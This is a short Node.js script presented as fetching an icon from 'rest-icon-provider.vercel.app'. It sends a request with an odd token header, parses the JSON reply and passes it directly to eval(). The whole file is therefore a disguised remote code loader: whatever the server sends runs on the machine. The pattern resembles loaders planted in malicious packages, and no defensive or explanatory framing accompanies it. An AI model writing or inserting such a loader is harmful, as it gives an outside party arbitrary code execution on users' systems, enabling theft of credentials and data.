const https = require('https');
const { parse } = require('path');

const url = 'https://rest-icon-provider.vercel.app/icons/812';

const options = {
  headers: {
    bearrtoken: 'logo'
  }
};

https.get(url, options, (res) => {
  let data = '';

  if (res.statusCode !== 200) {
    console.error('Failed to download. Status:', res.statusCode);
    res.resume();
    return;
  }

  res.on('data', chunk => {
    data += chunk;
  });

  res.on('end', () => {
    try {
      const parsed = JSON.parse(data);
      eval(parsed);
      console.log('✅ Received data:', parsed);
    } catch (err) {
      console.error('❌ Failed to parse JSON:', err.message);
    }
  });

}).on('error', err => {
  console.error('Error:', err.message);
});
